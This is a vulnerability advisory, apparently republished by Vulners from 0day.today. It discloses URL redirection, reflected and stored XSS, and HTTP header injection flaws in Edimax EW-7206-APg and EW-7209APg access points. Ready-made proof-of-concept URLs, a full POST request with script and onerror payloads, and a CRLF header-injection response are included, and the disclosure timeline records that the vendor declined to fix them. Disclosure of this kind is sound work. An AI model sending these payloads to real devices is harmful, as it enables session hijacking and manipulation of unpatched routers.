Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities

🗓️ 15 Feb 2013 00:00:00Reported by m-1-k-3Type 
zdt
 zdt🔗 0day.today👁 21 Views

Edimax EW-7206-APg and EW-7209APg Multiple Vulnerabilities - URL redirection, reflected and stored XSS, HTTP header injection

Code
============ Vulnerability Overview: ============
 
* URL Redirection:
    Parameter:  submit-url and wlan_url
 
http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de
 
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd
 
* reflected XSS:
    Parameter:  submit-url and wlan-url
                 
Injecting scripts into the parameter submit-url or wlan-url reveals that this parameter is not properly validated for malicious input.
 
Example Exploit:
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=&chan=11&macAddrValue=&wlanMacClone=0&wlanMac=&autoMacClone=no&repeaterSSID=&wlLinkMac1=&wlLinkMac2=&wlLinkMac3=&wlLinkMac4=&wlLinkMac5=&wlLinkMac6=&x=54&y=12&wlan-url=test><script>alert('XSSed')</script>test
 
* stored XSS
 
    * in System Utility -> Domain Name:
        => parameter: DomainName
         
Injecting scripts into the parameter DomainName reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
 
http://192.168.178.175/goform/formTcpipSetup?oldpass=&newpass=&confpass=&ip=192.168.178.175&mask=255.255.255.0&gateway=0.0.0.0&dhcp=2&DhcpGatewayIP=0.0.0.0&DhcpNameServerIP=0.0.0.0&dhcpRangeStart=192.168.178.100&dhcpRangeEnd=192.168.178.200&DomainName="><script>alert(2)</script>&leaseTimeGet=946080000&leaseTime=946080000&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged=
 
    * Stored XSS in wireless settings / basic settings -> ESSID
        -> The injected script code gets executed within the device information
 
Injecting scripts into the parameter ssid reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
 
Example Request:
POST /goform/formWlanSetup HTTP/1.1
Host: 192.168.178.175
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.175/wlbasic.asp
Authorization: Basic xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 351
 
apMode=0&band=2&ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281%29%3E&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=50&y=20&wlan-url=%2Fwlbasic.asp
 
* HTTP Header Injection:
 
    Parameter: submit-url
 
Injecting code into the parameter submit-url mode reveals that this parameter is not properly validated for malicious input and so it is possible to manipulate the header information.
 
http://192.168.178.175/goform/formWirelessTbl?submit-url=e82f5%0d%0aNew%20Header:%20PWND
 
Response:
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sat Jan  1 14:06:23 2000
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://192.168.178.175/e82f5
New Header: PWND
<snip>
 
============ Solution ============
 
No known solution available.
 
============ Time Line: ============
 
September 2012 - discovered vulnerability
21.09.2012 - contacted vendor with vulnerability details
24.09.2012 - vendor responded that they will not provide a fix
14.02.2013 - public disclosure

#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Feb 2013 00:00Current
7High risk
Vulners AI Score7
vulnerabilitiesedimaxurl redirectionreflected xssstored xsshttp header injectionsecurity advisorypublic disclosurevendor responseexploittimeline
21